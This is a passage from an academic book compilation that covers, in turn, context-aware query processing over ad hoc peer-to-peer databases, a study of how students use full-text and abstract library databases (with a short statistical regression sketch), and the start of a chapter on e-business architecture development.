The execution of the query follows a simple strategy. First, we materialize the virtual/hybrid relations. Then, we execute the query as usual. Clearly, although this is not the best possible strategy for all cases (especially when only nonblocking operators are involved), we find that performing further optimizations is an orthogonal problem, already dealt with in the context of blocking operators for streaming data (Babcock et al., 2002). Therefore, in this article we consider only this baseline strategy, since all relevant results can directly be introduced in the optimizer module of a peer. Specifically, the steps to follow for the execution of the query are:

1.	All the Call_WS operators are activated and the appropriate services are invoked.
2.	The Wrapper_Pop operators collect the incoming XML results and queue them towards the appropriate Fill operators, which further push them towards the extents of the relations on the hard disk. This is performed in a pipelined fashion.
3.	Once all virtual/hybrid relations have been materialized, the rest of the query plan is a traditional left-deep tree that executes as usual.
Example

In the following, we discuss the construction of the query plan for the query of Figure 10.

Figure 10. Query for which the plan is to be constructed

SELECT CARS.PLATE, CARS.VEL, BRANDS.COUNTRY
FROM CARS, BRANDS
WHERE CARS.BRAND = BRANDS.BRAND
WITH AGE < 5 AND
	HORIZON COMMUNITY DISTANCE_UNDER_5KM AND
	TIMING CONTINUOUS PULL_BASED_PERIOD = 7 AND
	AVAILABILITY > 60% AND
	RESPONSE_TIME < 3.0 AND
	CLASS = 'european'

1.	Step 1: The query involves two tables, CARS and BRANDS. The application of the operator CHECK_TABLES over the two relations results in the determination that the first is a hybrid one and the second a locally stored one.
2.	Step 2: The operator CHECK_PEERS is applied to the catalog of peer p1 in order to determine the peers of interest of the query. Taking into consideration the age of the tuples found in relation CARS and the system catalog, peer p1 decides that the peers of interest are peers 2 and 8.
3.	Step 3: The operator CALL_WS is applied over each peer of interest.
4.	Step 4: For each peer over which a CALL_WS is applied, we apply the operator WRAPPER_POP to coordinate the execution of its operations.
5.	Step 5: The operator FILL is applied to the result of each WRAPPER_POP.
6.	Step 6: The rest of the query plan is constructed as usual, with the only difference that the sub-tree of relation CARS is the one constructed in the previous steps.

Figure 11. Query plan for the aforementioned query of Figure 10

Figure 12. System architecture (client side: parser, query optimizer, query execution engine, local DB, system catalog, and catalog update module; server side: an application server exposing Web service operations)
IMPLEMENTATION

Figure 12 shows the full-blown architecture required to support our approach for context-aware query processing in ad hoc environments of peers. The elements shown in the figure are divided with respect to the client and the server roles played by peers. To play the client role, a peer comprises a traditional query-processing architecture, involving a parser, an optimizer, and a query processor. A local database and the system catalog complement the ingredients of the client part of a peer. Playing the server role amounts to publishing a set of Web services, hosted by an application server, which is responsible for their proper execution. As usual, whenever a query is posed, the parser is the first module that is fired. The optimizer produces alternative plans, out of which the best, with respect to a given cost model, is chosen. The query execution engine executes the query over the local database and returns the results. Our first prototype implementation does not currently support the query optimizer subsystem. Instead, standard query plans are produced after parsing the user queries. The query execution subsystem includes a mechanism that allows visualizing the aforementioned plans. Figure 11 gives a visualized execution plan through the Yed tool, which graphically presents graphs. Populating and updating the contents of the system catalog is done either statically or dynamically. In the former case, the peer is responsible for updating the catalog through a catalog-specific API. The static update of the catalog takes advantage of the possible availability of peer-specific dynamic service discovery mechanisms. Such mechanisms may be exploited by the peer itself, which takes further charge of updating the catalog accordingly. The dynamic catalog update is realized by the catalog update subsystem, which relies on WSAMI, a middleware platform for mobile Web services (Issarny et al., 2005). WSAMI provides the naming and directory service that allows the dynamic discovery of Web services provided in mobile computing environments. Specifically, WSAMI is based on an SLP server, that is, an implementation of the standard SLP protocol (http://www.openslp.com), for the discovery of networked entities in mobile computing environments.
RELATED WORK

The work that is closely related to the proposed approach for context-aware query processing over ad hoc environments of peers can be categorized into work concerning the fundamentals of heterogeneous database systems, context-aware computing, and approaches that specifically focus on context-aware service-oriented computing. The prominent approaches that fall into the aforementioned categories are briefly summarized in the remainder of this section.
Heterogeneous Database Systems

Our approach for querying ad hoc environments of peers bears some similarity to the traditional wrapper-mediator architectures used in heterogeneous database systems (Roth & Schwarz, 1997; Haas et al., 1997). Such systems consist of a number of heterogeneous data sources. The user of the system has the illusion of a homogeneous data schema, which is actually realized by the wrapper-mediator architecture.
In particular, each data source is associated with a wrapper. The wrapper encapsulates the data source under a well-defined interface that allows executing queries. Each user query is translated by the mediator into data-source-specific queries, executed by the corresponding wrappers. As opposed to traditional heterogeneous database systems, in the environments we examine the roles of users and data sources are not discrete. Each peer is a heterogeneous data source offering information to other peers that play the role of the user. Therefore, each peer may eventually serve as a data source and as a user issuing queries. Analogous to the wrapper elements in our case are the Web services that give access to peers playing the role of data sources. Analogous to the mediator element is the hybrid relation mapping procedure that executes workflows on Web services. In simple words, a traditional heterogeneous database system is a “1 mediator to N wrappers architecture.” An ad hoc environment of peers in our case is an “N mediators to N wrappers architecture.” Another fundamental difference between the environments we examine and traditional heterogeneous database systems is that in our case the cardinality and the contents of the set of data sources may constantly change.
Context-Aware Computing and Infrastructures

In Dey (2001), context is defined as any information that can be used to characterize the interaction between a user and an application, including the user and the application. Several middleware infrastructures follow this definition toward enabling context reasoning and management (Fahy & Clarke, 2004; Chen, Finin, & Joshi, 2003; Chan & Chuang, 2003; Capra, Emmerich, & Mascolo, 2003; Gu, Pung, & Zhang, 2005; Roman et al., 2002). Amongst these approaches, CASS (Fahy & Clarke, 2004) bears some similarity with our approach, since context is modeled in terms of a relational data model. However, in our approach we do not assume centralized information management, and virtual relations are dynamically compiled.

Context-Aware Service-Oriented Computing

In general, the integration of context-awareness and service-orientation has only just begun to gain the attention of the corresponding research communities. In Keidl & Kemper (2004), for instance, the authors introduce ways of associating context with Web service invocations. In Maamar, Mostefaoui, & Mahmoud (2005), the authors go one step further by examining the problem of customizing Web service compositions with respect to contextual information. Web service execution is customized according to different types of context. Similarly, in Zahreddine & Mahmoud (2005), the authors propose a framework for dynamic context-aware service discovery and composition. Specifically, contextual information regarding the technical characteristics of user devices is used towards discovering services that match these characteristics.
CONCLUSION AND FUTURE WORK

In this article, we have dealt with context-aware query processing in ad hoc peer-to-peer networks. Each peer in such an environment has a database over which users want to execute queries. This database involves (a) relations that are locally stored and (b) relations that are virtual or hybrid. In the case of virtual relations, all the tuples of the relation are collected from peers that are present in the network at the time when the query is posed. Hybrid relations involve both locally stored tuples and tuples collected from the network. The collaboration among peers is performed through Web services. The integration of the external data, before they are locally collected into a peer's database, is performed through
a workflow of operations. We do not perform query processing in the traditional way; rather, we involve context-aware query processing techniques that exploit the neighborhood of each peer and the Web service infrastructure that deals with the heterogeneity of peers. In this setting, we have formally defined the system model for SQLP, an extension of traditional SQL on the basis of contextual environment requirements that concern the termination of queries, the failure of individual peers, and the semantic characteristics of the peers of the network. We have precisely defined the semantics of the language SQLP. We have also discussed issues of data integration, performed through workflows of Web services. Moreover, we have presented an initial query execution algorithm as well as the typical definition of all the operators that can take part in a query execution plan. A prototype implementation is also discussed.
ACKNOWLEDGMENT This research is co-funded by the European Union - European Social Fund (ESF) & National Sources, in the framework of the program “Pythagoras II” of the “Operational Program for Education and Initial Vocational Training” of the 3rd Community Support Framework of the Hellenic Ministry of Education.
REFERENCES

Abolhasan, M., Wysocki, T., & Dutkiewicz, E. (2004). A review of routing protocols for mobile ad hoc networks. Ad Hoc Networks, 2, 1-22.

Androutsellis-Theotokis, S., & Spinellis, D. (2004). A survey of peer-to-peer content distribution technologies. ACM Computing Surveys, 36(4), 335-371.
Babcock, B., Babu, S., Datar, M., Motwani, R., & Widom, J. (2002, June). Models and issues in data stream systems. In Proceedings of the 21st ACM SIGACT-SIGMOD-SIGART Symposium on Principles of Database Systems (PODS’02) (pp. 1-16). Capra, L., Emmerich, W., & Mascolo, C. (2003). CARISMA: Context - Aware Reflective Middleware System for Mobile Applications. IEEE Transactions on Software Engineering, 29(10), 929-945. Chan, A.T., & Chuang, S.-N. (2003). MobiPADS: A reflective middleware for context-aware mobile computing. IEEE Transactions on Software Engineering, 29(10), 1072-1085. Chen, H., Finin, T., & Joshi, A. (2003). An ontology for context-aware pervasive computing systems. Knowledge Engineering Review, 18(3), 197-207. Chlamtac, I., Conti, M., & Liu, J. J.-N. (2003). Mobile ad hoc networking: Imperatives and challenges. Ad Hoc Networks, 1(1), 13-64. Dey, A.K. (2001). Understanding and using context. Personal and Ubiquitous Computing, 5(1), 4-7. Fahy, P., & Clarke, S. (2004, June). CASS - Middleware for mobile context-aware applications. In Proceedings of the 2nd ACM SIGMOBILE International Conference on Mobile Systems, Applications and Services (MobiSys’04). Gu, T., Pung, H.-K., & Zhang, D.-Q. (2005). A service-oriented middleware for building contextaware services. Journal of Network and Computer Applications, 28, 1-18. Haas, L.M., Kossmann, D., Wimmers, E.L., & Yang, J. (1997, August). Optimizing queries across diverse data sources. In Proceedings of 23rd International Conference on Very Large Data Bases (VLDB’97) (pp. 276-285).
Issarny, V., Sacchetti, D., Tartanoglou, F., Sailhan, F., Chibout, R., Levy, N., & Talamona, A. (2005). Developing ambient intelligence systems: A solution based on Web services. Journal of Automated Software Engineering, 12(1), 101-137. Keidl, M., & Kemper, A. (2004, March). A framework for context-aware adaptable Web services. In Proceedings of 9th International Conference on Extending Database Technology (EDBT ‘04) (pp. 826-829). Maamar, Z., Mostefaoui, S., & Mahmoud, Q. (2005, January). Context for personalized Web services. In Proceedings of 38th IEEE Hawaii International Conference on System Sciences (HICSS’05) (pp. 166.2). Madhavan, J., Bernstein, P.A., Doan, A., & Halevy, A.Y. (2005, April). Corpus-based schema matching. In Proceedings of the 21st International Conference on Data Engineering (ICDE 2005) (pp. 57-68).
Ozsu, T., & Valduriez, P. (1991). Principles of distributed database systems. Prentice-Hall. Roman, M., Hess, C.K., Cerqueira, R., Ranganathan, A., Campbell, R.H., & Nahrstedt, K. (2002). Gaia: A middleware infrastructure to enable active spaces. IEEE Pervasive Computing, 1(4), 74-83. Roth, M.T., & Schwarz, P.M. (1997, August). Don’t scrap it, wrap it! A wrapper architecture for legacy data sources. In Proceedings of 23rd International Conference on Very Large Data Bases (VLDB’97) (pp. 266-275). Zahreddine, W., & Mahmoud, Q.H. (2005, March). An agent-based approach to composite mobile Web services. In Proceedings of 19th International Conference on Advanced Information Networking and Applications (AINA 2005) (pp. 189-192).
This work was previously published in the Journal of Electronic Commerce in Organizations, edited by M. Khosrow-Pour, Volume 6, Issue 1, pp. 62-88, copyright 2008 by IGI Publishing, formerly known as Idea Group Publishing (an imprint of IGI Global).
Chapter 5.16
Misuse of Online Databases for Literature Searches

Robert A. Bartsch
University of Houston–Clear Lake, USA
ABSTRACT
INTRODUCTION
Online library databases are the primary method for finding relevant literature in many fields. These databases either primarily have abstracts or have the entire article online (i.e., full-text). This chapter describes how students use and misuse abstract and full-text databases when conducting literature searches. Findings from two studies indicate (1) students overestimate the usefulness of full-text databases, (2) students do not know which type of database is the best tool for a particular situation, and (3) students favor technology that is easier for them to use. By understanding the implications of these findings, it is hoped instructors can create lectures and assignments that increase students’ information literacy levels. Additionally, this chapter provides an example of how people, in general, will use new technology that is easier but is not necessarily more useful.
Instructional technology has been a benefit to students, allowing them to access more information more quickly. There is no question students use the available technology such as the World Wide Web; however, there is a question as to whether students use it well. This chapter highlights examples of when students do not use instructional technology well and the importance of proper education about instructional technology. Specifically, this chapter focuses on online literature search databases (e.g., PsycINFO, ERIC) that are used in college and university libraries across the country. This chapter describes two studies that examine whether students properly use this instructional technology. These studies provide recommendations to instructors and college librarians about online databases, and more importantly, these studies illustrate some
problems that students and others can have in using instructional technology.
BACKGROUND

There are two main types of online literature search databases: abstract and full-text. In abstract databases, abstracts are available for almost all articles in a discipline, and some, but not all, articles may also be available as full-text documents. In full-text databases, the database is composed entirely of full-text articles; however, the database is likely to be limited. In fact, the highest reported percentage of relevant articles from a discipline appearing in a full-text database is only 46% (Chapman, 2001), and many are less than 10% (Carlson, 2001; Herring, 2001). Not surprisingly, students have an affinity for full-text databases because articles may be printed while at a computer, possibly at home, whereas with abstract databases, students have to physically locate and copy the article in the library or complete an interlibrary loan request and wait days or weeks for the article. Many teachers complain that students use full-text databases too much and ignore abstract databases (e.g., Carlson, 2001; Herlily, 2000; Littrell, 2000). One survey (MacDonald & Dunkelberger, 2000) found some students exclusively used full-text databases. Many instructors believe that, by only using full-text databases, students will miss important references. In addition, instructors may worry that solely using full-text databases can lead to beliefs that literature reviews are very easy and that articles from full-text databases are equal to, if not superior to, other articles (Laskowski, 2002). The technology acceptance model (TAM) predicts user acceptance of new technology (Davis, 1989). TAM is based on the social psychological theory of reasoned action (Azjen & Fishbein,
1980), which predicts behavior in general. According to TAM, user acceptance is predicted by two main factors: perceived usefulness and perceived ease of use. Usefulness is defined as “the degree to which a person believes that using a particular system would enhance his or her job performance” (Davis, 1989, p. 320), and ease of use is defined as “the degree to which a person believes that using a particular system would be free of effort” (Davis, 1989, p. 320). In terms of literature search databases, usefulness relates directly to the number of articles that are available. Abstract databases are therefore more useful because they are more complete. Ease of use is determined by how quickly and easily a person can obtain articles. Given that search functions are similar between abstract and full-text databases, full-text databases are easier to use because of the speed of obtaining copies of articles. In addition, some researchers have included subjective norms (i.e., what important others think of the technology) in TAM as another predictor of user acceptance (Venketesh & Morris, 2000). Many teachers provide norms favoring abstract databases for large literature assignments, but these expectations may be poorly communicated. It is easy to predict that full-text databases will be rated higher in ease of use, and previous studies have indicated full-text databases will have higher levels of user acceptance (MacDonald et al., 2000). However, it is not as clear whether students will perceive abstract or full-text databases to be more useful. Students may recognize that abstract databases, by being more complete, are more useful. On the other hand, students may assume full-text databases are more useful because they are the technology they favor. Actually, the usefulness of abstract vs. full-text databases depends on the type of assignment. For example, full-text databases would be just as useful for an assignment to find a single article
about an assigned topic. Both full-text and abstract databases would be able to provide this information. However, a full-text database would be less useful for a complete literature review of an area, because it would likely have only a subset, rather than all, of the necessary articles. This subset could easily miss major theoretical points or important empirical studies that can only be found in articles listed in the abstract database. (Even if the full-text database is less useful, it is still likely easier to use.) It would be interesting to examine whether students recognize when full-text databases are and are not useful; in other words, to determine whether students know how to correctly use this instructional technology. Additionally, it is not clear whether students are accurate in their beliefs about how useful full-text databases are. This chapter presents two studies that explore (1) whether students are accurate in their knowledge of the usefulness of online databases, (2) why students prefer to use full-text databases, and (3) whether students recognize situations in which full-text databases are and are not useful.
STUDY 1 In spring 2002, Bartsch and Tydlacka (2003) examined whether important psychology articles were physically held in a medium-sized teaching university library and whether they were available online as full-text articles through the same university. They also asked students (n = 81) taking research design and statistics classes to estimate what percentage of articles would be available both physically at the library and online as full-text documents. On average, students estimated that 55% (SD = 28%) of important articles would be available physically at their teaching university and 61% (SD = 29%) would be available full-text online. In fact, 69%
of students believed they would be able to find just as many important articles, or more, in full-text databases as physically in the library. In actuality, however, only 9% of these important articles were available online, and 55% were available physically in the university library. Clearly, students did not have a good idea of what they could and could not find in full-text databases. The students in this study did not understand how low the usefulness of the full-text databases available at their university was at that time. Additional data from this study give several other indications that students do not have a high level of knowledge about this instructional technology. The high standard deviations of the estimates indicate that, overall, students did not have a good conception of how many articles could be found either physically at the library or online: many students felt most journal articles would be available, while many others believed only a small percentage would be. In addition, students who stated they were more familiar with literature searches were marginally less accurate in their judgments (r = .22, p = .06). This result indicates that students who believed they knew more about literature searches and the related instructional technology actually did not know more, and possibly knew less.
STUDY 2 For the second study, not previously reported in the literature, I wanted to determine (1) whether abstract or full-text databases are perceived as higher in ease of use, perceived usefulness, and user acceptance, (2) which factors better predict user acceptance of abstract and full-text databases, and (3) whether the answers to the first two questions depend on the type of literature search that is needed.
For this study, I surveyed 197 undergraduate and Master’s level students in research methods and statistics classes. Most of the participants (80%) were female, the majority were white (65%), and the average age was 29. I collected data from these students using a self-report survey. I manipulated one independent variable and measured four others. The manipulated independent variable was the type of assignment given in the instructions. At the beginning of the survey, after abstract and full-text databases had been defined, participants were asked to imagine they were either (1) to find an article on the theory of reasoned action and write a paragraph summary, (2) to find five important articles on the theory of reasoned action and write a 2-page literature review, or (3) to find approximately 30 articles and write a 15-20 page literature review on the current status of the theory of reasoned action. Participants received only one of the three scenarios, and the scenarios were randomly assigned. The four measured variables were perceived usefulness (e.g., “Abstract databases would help me make an A on this assignment”), ease of use (e.g., “For this assignment full-text databases would help me save time”), social norms (e.g., “My teachers would want me to use abstract databases for this assignment”), and familiarity (e.g., “I am familiar with full-text databases”). Each of the measured variables was created from at least three questions based on questions from Davis (1989) and was rated on a 5-point strongly disagree to strongly agree Likert scale, with higher scores indicating more agreement. These variables were measured separately for abstract and full-text databases, creating a total of eight scaled measures. The dependent variable, user acceptance, was also measured by averaging three 5-point strongly agree to strongly disagree Likert questions. An example question was “For this assignment, I
would find most of my literature through full-text databases.” Not surprisingly, user acceptance scores were higher for full-text databases (M = 4.26) than for abstract databases (M = 3.28), p < .001. Additionally, full-text databases were rated as more useful (M = 3.93 vs. 2.97), easier to use (M = 3.99 vs. 3.09), having more positive social norms (M = 3.68 vs. 3.10), and more familiar (M = 4.15 vs. 3.45), all p’s < .001. As expected, students favored full-text databases, had more familiarity with them, and felt they were easier to use. In addition, they felt full-text databases were more useful and had greater approval from instructors. These last two perceptions, based on the literature, are likely incorrect. I then examined which variables correlated with user acceptance for both abstract and full-text databases. Overall, there were strong correlations between user acceptance and usefulness, ease of use, social norms, and familiarity for both abstract (all r’s > .40, all p’s < .001) and full-text databases (all r’s > .40, all p’s < .001). Each measured factor predicted user acceptance; these included the three factors hypothesized in TAM and also familiarity. To determine which factors were most important to a student attempting to choose between abstract and full-text databases, I calculated the difference in user acceptance by subtracting the user acceptance score for abstract databases from the full-text score, such that higher scores indicated greater user acceptance of full-text databases compared to abstract databases. A multiple regression was performed with the eight variables (usefulness, ease of use, social norms, and familiarity for both abstract and full-text databases) predicting favoritism in user acceptance. This analysis isolated the effect of each variable while controlling for the other variables (Howell, 2002).
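As a concrete illustration of this analysis, the following minimal sketch shows how the difference score and the eight-predictor regression could be computed; the data file and column names are hypothetical stand-ins, not the original survey data.

```python
# Hypothetical sketch of the Study 2 analysis: a difference score for user
# acceptance (full-text minus abstract) regressed on the eight scale scores.
# File and column names are illustrative; the original data are not available.
import pandas as pd
import statsmodels.api as sm

df = pd.read_csv("survey_scales.csv")  # one row per respondent, 1-5 scale means

# Favoritism in user acceptance: higher = stronger preference for full-text
df["accept_diff"] = df["accept_fulltext"] - df["accept_abstract"]

predictors = [
    "useful_abstract", "ease_abstract", "norms_abstract", "familiar_abstract",
    "useful_fulltext", "ease_fulltext", "norms_fulltext", "familiar_fulltext",
]

X = sm.add_constant(df[predictors])          # eight predictors plus intercept
model = sm.OLS(df["accept_diff"], X).fit()   # ordinary least squares regression
print(model.summary())  # z-score the variables first if standardized betas are wanted
```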
Results indicated that perceived usefulness of the abstract databases had the strongest effect (β = -.36), whereas the assignment manipulation had no significant effect on this preference, p > .10. Additionally, there were no significant differences between the three assignment conditions on usefulness, ease of use, or social norms for either abstract or full-text databases, all p’s > .10. Students failed to perceive the differential usefulness of the abstract and full-text databases given different assignments. Students were not educated enough about the technology to recognize which database would be best for which assignment.
RECOMMENDATIONS FOR INSTRUCTORS Given the findings from these two studies, I provide some recommendations for instructors. These recommendations are based on the goal that at the end of their college career students should have information literacy. That is, students should have the ability to “recognize when information is needed and have the ability to locate, evaluate, and use effectively the needed information” (American Library Association, 1989).
1. Do not assume students know how to correctly use technology for literature searches. Even if a student states they are familiar with tools for literature searches, the evidence presented here indicates they may not be aware of their actual knowledge level. Therefore, activities regarding this technology should not be optional.
2. Students need to be familiar with the more useful but more difficult technology. Therefore, instructors should spend more time demonstrating how to use the abstract databases and less time demonstrating the full-text databases. Furthermore, it is recommended to create an assignment that requires students to use the more useful but more difficult technology.
3. In addition to showing how to use a technological tool, instructors should also discuss when it is and is not appropriate to use each tool. If students are tested on how to use each tool, then they should also be tested on when and when not to use that tool.
4. Instructors should emphasize that using abstract databases takes more time. Although full-text databases are easier to use, abstract databases, which take more time, are often needed for work of the highest quality.
FUTURE TRENDS Full-text databases may never become the sole place to find journal articles (Brooks, 2003) and will likely never replace libraries themselves (Mann, 2001). Nevertheless, in the future, full-text databases will become more complete and more of them will be available. Abstract databases will likely become less necessary and may only be needed for embargoed journals (Brooks, 2003). As full-text databases become more complete, more attention will be given to how to make these databases better (e.g., Bell, 2003). Hopefully, research will continue both on how to better design full-text databases to increase ease of use and on how to provide better instruction that encourages quality use of this instructional technology.
CONCLUSION These studies demonstrate that students were not accurate in their knowledge of the usefulness of literature search databases and did not recognize that an online tool could be useful in one situation and not in another. In fact, it appears students substituted ease of use for
usefulness when thinking about this instructional technology. One goal of instructional technology is to make work easier or effortless for its users; however, users have to keep in mind that ease of use does not equate to usefulness. Instructional technologists and teachers need to be aware of this type of technological advancement, in which the technology makes work easier but also reduces the quality of the work. Instructors must remember that students may not have a good grasp of how to properly conduct literature searches. Although many students understand the basics, they do not know all the advantages and disadvantages of the instructional technology. Unfortunately, the students who understand the basics may not realize what they do not know. These incorrect student beliefs, coupled with some instructors’ tendency to overestimate how much students know about the research process (Leckie, 1996; Valentine, 2001) and faculty’s incorrect belief that students have similar perceptions about instructional technology (Laskowski, 2002), can produce a critical lack of instruction about instructional technology. Although it is interesting to note that students do not properly use online literature search databases, that is not the main message of this chapter. Rather, the main message is that any instructional technology can be misused by students who believe they are using the technology correctly. This chapter provides a concrete example of why there needs to be more training in information literacy, training that covers not only how to use current technology but also how to determine when a technology is or is not appropriate.
REFERENCES American Library Association. (1989). Presidential Committee on Information Literacy.
Final Report. Retrieved August 18, 2006, from http://www.ala.org/ala/acrl/acrlpubs/whitepapers/presidential.htm
Azjen, I., & Fishbein, M. (1980). Understanding attitudes and predicting social behavior. Englewood Cliffs, NJ: Prentice Hall.
Bartsch, R. A., & Tydlacka, B. L. (2003). Student perceptions (and the reality) of percentage of journal articles found through full-text databases. Research Strategies, 19, 128-134.
Bell, S. J. (2003). Is more always better? American Libraries, 34(1), 44-46.
Brooks, S. (2003). Academic journal embargoes and full text databases. Library Quarterly, 73, 243-260.
Carlson, S. (2001, November 16). The deserted library. The Chronicle of Higher Education, pp. A35-A38.
Chapman, K. (2001). An examination of the usefulness of JSTOR to researchers in finance. Behavioral & Social Sciences Librarian, 19(2), 39-47.
Davis, F. D. (1989). Perceived usefulness, perceived ease of use, and user acceptance of information technology. MIS Quarterly, 13, 319-339.
Herlily, C. S. (2000). Internet sirens and the role of today’s librarians. Liberal Education, 86(3), 46-51.
Herring, M. W. (2001). 10 reasons why the internet is no substitute for a library. American Libraries, 32(4), 76-78.
Howell, D. C. (2002). Statistical methods for psychology (5th ed.). Pacific Grove, CA: Duxbury.
Laskowski, M. S. (2002). The role of technology in research: Perspectives from students and
instructors. Portal: Libraries and the Academy, 2, 305-319.
Leckie, G. J. (1996). Desperately seeking citations: Uncovering faculty assumptions about the undergraduate research process. Journal of Academic Librarianship, 22, 201-208.
Littrell, L. (2000). Bibliographic instruction: Not just for students? College and Research Libraries, 61, 396-398.
MacDonald, B., & Dunkelberger, R. (2000). Fulltext database dependency: An emerging trend among undergraduate library users? Research Strategies, 16, 301-307.
Mann, T. (2001). The importance of books, free access, and libraries as places--and the dangerous inadequacy of the information science paradigm. Journal of Academic Librarianship, 27, 268-281.
Valentine, B. (2001). The legitimate effort in research papers: Student commitment versus faculty expectations. Journal of Academic Librarianship, 27, 107-115.
Venketesh, V., & Morris, M. G. (2000). Why don’t men ever stop to ask for directions? Gender, social influence, and their role in technology acceptance and usage behavior. MIS Quarterly, 24, 115-139.
KEY TERMS Abstract Databases: Online literature search databases that have large numbers of abstracts with some full-text articles. Ease of Use: Amount of effort needed to meet a goal using a particular technology.
Full-Text Databases: Online literature search databases in which each article indexed is present in its entirety.
Technology Acceptance Model: Describes factors that predict user acceptance of technology.
Online Literature Search Databases: Internet-based tools that help find journal articles.
Usefulness: Quality of output when using a particular technology.
Subjective Norms: Social rules for how people should and should not use technology.
This work was previously published in Handbook of Research on Instructional Systems and Technology, edited by T. Kidd and H. Song, pp. 373-380, copyright 2008 by Information Science Reference, formerly known as Idea Group Reference (an imprint of IGI Global).
Section VI
Managerial Impact
This section presents contemporary coverage of the managerial implications of database technology. Particular contributions address e-services, database grids, and project databases. The managerial research provided in this section allows executives, practitioners, and researchers to gain a better sense of how database technology can inform their practices and behavior.
Chapter 6.1
Conflicts, Compromises, and Political Decisions: Methodological Challenges of Enterprise-Wide E-Business Architecture Creation
Kari Smolander, Lappeenranta University of Technology, Finland
Matti Rossi, Helsinki School of Economics, Finland
ABSTRACT This chapter describes the architecture development process in an international ICT company, which is building a comprehensive e-business system for its customers. The implementation includes the integration of data and legacy systems from independent business units and the construction of a uniform Web-based customer interface. We followed the early process of architecture analysis and definition over a year. The research focuses on the creation of e-business architecture and observes that, instead of being guided by a prescribed method, the architecture emerges through somewhat non-deliberate actions obliged by the situation and its constraints,
conflicts, compromises, and political decisions. The interview-based qualitative data is analyzed using grounded theory, and a coherent story explaining the situation and its forces is extracted. Conclusions are drawn from the observations, and the possibilities and weaknesses of the support that UML and RUP provide for the process are pointed out.
INTRODUCTION Robust technical architecture is considered one of the key issues when building successful e-business systems. The design of technical architecture is usually seen as a set of trade-offs between avail-
able resources (such as available personnel and money) and operational requirements related to technical architecture, such as scalability, capacity, response times, security, and availability. The software architecture research provides design tools for technical architecture design, including, for instance, architecture description languages (Dashofy, Van der Hoek, & Taylor, 2005; Medvidovic & Taylor, 2000), common architectural patterns and styles (Monroe, Kompanek, Melton, & Garlan, 1997), architectural trade-off methods (Kazman, Klein, & Clements, 2000), architectural frameworks (Leist & Zellner, 2006), and technologies for e-business implementation (Bichler, Segev, & Zhao, 1998). In an ideal world, the work of an architect would be to find the explicit requirements for architecture, and select the best possible design tools and technologies to implement the architecture. Furthermore, the architecture development team would make rational trade-offs concerning the requirements, and produce the best realistic solution for the architecture with the selected design tools and implementation technologies. However, the literature contains many examples of cases where technical rationality has not been sufficient for the success in IS projects (e.g. Sauer, Southon, & Dampney, 1997). Architecture researchers have found that the work of an architect and the usage of architecture are bound by more diverse organizational issues and limitations that the classical technical software architecture research ignores. These include for example the diverse role of an architect in an organization observed by Grinter (1999) and varying uses and meanings of architecture in practice (Smolander & Päivärinta, 2002a). The main message of these studies is that an architect has a social, and even political, role in an organization and that different stakeholders relate different meanings to architecture to fulfill their informational requirements in the development process. This phenomenon has remarkable similarities to information systems development in general. As pointed out by
Klein and Hirschheim, the implicit assumption of rationality in the development processes hides the legitimating of the goals and differing political agendas of various stakeholders (Hirschheim & Klein, 1989). To understand the issues involved in architecture development, we observed a project that was developing e-business architecture in an international ICT company. We interviewed various stakeholders to gain a deep insight into the process. The company already had several e-commerce systems in individual business units, but it needed a more uniform customer interface for its various systems. The e-business project included the integration of data and legacy systems from these units and the construction of a uniform Web-based customer interface hiding the differences between the business units. Our goal was to find ways of supporting architecture development by means of methods and description languages, such as UML. We were aware of efforts to support architecture design with UML (e.g., Conallen, 1999; Garlan & Kompanek, 2000; Hofmeister, Nord, & Soni, 1999b; Object Management Group, 1999, 2006), but these efforts were mostly targeted at technical software design, and we did not know how well they would support a large socio-technical or organizational project, such as enterprise or e-business architecture development. Therefore, we decided to observe a real-world project and concentrate on the requirements that e-business architecture development, in its complex organizational context, places on description languages and development methods. Next, we decided to compare the observed requirements to the support that UML and RUP offer, because they, together, form the current methodological basis for many systems development organizations. UML is the de facto standard language in software and systems development, and RUP (Jacobson, Booch, & Rumbaugh, 1999) is a widely known process model that claims to improve development process maturity (Kuntzmann & Kruchten, 2003). We believed that this kind of knowledge would
benefit both practitioners in process improvement and developers of UML extensions. Another interest was to find out what factors influenced the creation of e-business architecture: was it designed purposefully by software architects through rational decisions and trade-offs, or did it emerge through somewhat non-deliberate actions obliged by the situation and its constraints, conflicts, compromises, and political decisions? This is a very important issue because, unlike software architecture, e-business architecture is very tightly coupled with the business models of the company, and thus the architecture has a far more direct impact on business than, for example, low-level system architecture. Furthermore, if the business models are not supported by the e-business architecture, then the business strategy will not work (Ross, Weill, & Robertson, 2006). We used open interviews of various actors in the project to gather the necessary information about it. We analyzed the qualitative data from the interviews using grounded theory (Glaser & Strauss, 1967) as the research method and concluded the analysis by categorizing the issues that had emerged using the taxonomy of Lyytinen (1987). Thus, we classified the issues as belonging to the technical, language, and organizational contexts. From this classification of issues, we extracted requirements for development methods for developing integrated e-business solutions and compared these requirements to the support that the combination of UML and RUP provides. We observed that most of the problems encountered had very little to do with descriptions of the architecture per se. Rather, what was problematic were the issues that architecture development exposed about the underlying organization. This is an important finding, as most of the research into architecture has been about effective description languages and design processes, and there is a void of research about the organizational consequences of architecture development.
The article is organized as follows: we start by explaining in more detail what is meant by architecture in this article (Section 2). In Section 3, we describe the research process and method used. Section 4 describes the situation the company is facing and the motives for the change and for the implementation of the e-business system. In Section 5, we describe the situation and the context of the development project aiming at e-business implementation and the consequences of that situation for the progress of the project. From the observed issues faced by the development project, we draw conclusions, extract the requirements for development methods in e-business architecture development, and compare the requirements to the support that the combination of UML and RUP provides (Section 6). We point out areas where current research does not support the needs of the practice of architecture development in general and e-business architecture development in particular.
ARCHITECTURE IN SYSTEMS DEVELOPMENT In this study, we describe a process where a comprehensive e-business architecture is being created. In addition to e-commerce systems serving external customer transactions, e-business includes both the integration and streamlining of internal information systems to serve the new digitally enabled business processes (Kalakota & Robinson, 2001) and the unified customer interface (Ross et al., 2006). For the sake of simplicity, we understand e-business here to cover both the transactions and processes within a firm and the integrated external e-commerce systems, as in Kalakota and Robinson (2001). This enables us to interpret the process in the studied organization as the process of building an integrated e-business architecture. Ross et al. (2006) stress architecture as the necessary foundation for executing comprehensive e-business that operates across functions.
